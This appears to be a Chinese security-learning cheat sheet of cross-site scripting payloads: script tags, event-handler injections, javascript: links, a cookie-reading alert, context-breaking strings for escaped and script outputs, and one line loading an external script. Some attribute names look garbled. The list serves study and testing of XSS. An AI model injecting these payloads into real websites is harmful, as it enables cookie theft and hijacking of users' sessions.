payload-有效载荷:
<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x one rror=alert(1)> #加载图形失败执行
<iframe onl oad=alert('xss')> #框架
<svg onl oad=alert(1)>
<video onl oadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onl oad=alert(1)>
<style onl oad=alert(1)></style>
<input onm ouseover=alert(1)> (简单防绕过)
#' onclick="alert(111)"> (使用DOM型的xss)
xss之htmlspecialchars方法:
1) ' onclick='alert(111)'
2) ' onm ouseover='alert(1)
3) ' onm ouseover='javascript:alert(1)'
xss之href输出:(输入的参数在herf标签中,可以使用javascript协议来执行js)
javascript:alert(1)
xss之js输出
lili'</script><script>alert("xss")</script>
对于GET和POST 方式的,随便输入,检查在标签<p>中,就可以直接用简单的payload进行注入,如:
<script>alert(1)</script>
<input onm ouseover=alert(1)>
<body onl oad=alert(1)>
URL编码:
"onmouseover="61leralertt(11) %22onmouseover%3D%2261leralertt(11)
相关文章
- 12-19python中几个常见的“黑盒子”之 列表list
- 12-19git操作之常见问题解决方案
- 12-19Swift 常见问题之Swift如何循环遍历数组通过索引和迭起 for 条件控制语句(教程含解决方案)
- 12-19风炫安全WEB安全学习第二十六节课 XSS常见绕过防御技巧
- 12-19存储系列之DAS、SAN、NAS三种常见架构概述
- 12-19「理解HTTP」之常见的状态码segmentfault
- 12-19socket常见选项之SO_REUSEADDR,SO_REUSEPORT
- 12-19API 测试面试必备之 REST 常见问答
- 12-19Hadoop基础-常见异常剖析之防坑小技巧
- 12-19移动常见问题--H5标签之浏览器兼容性、JS之浏览器兼容性、CSS3之浏览器兼容性、移动端动画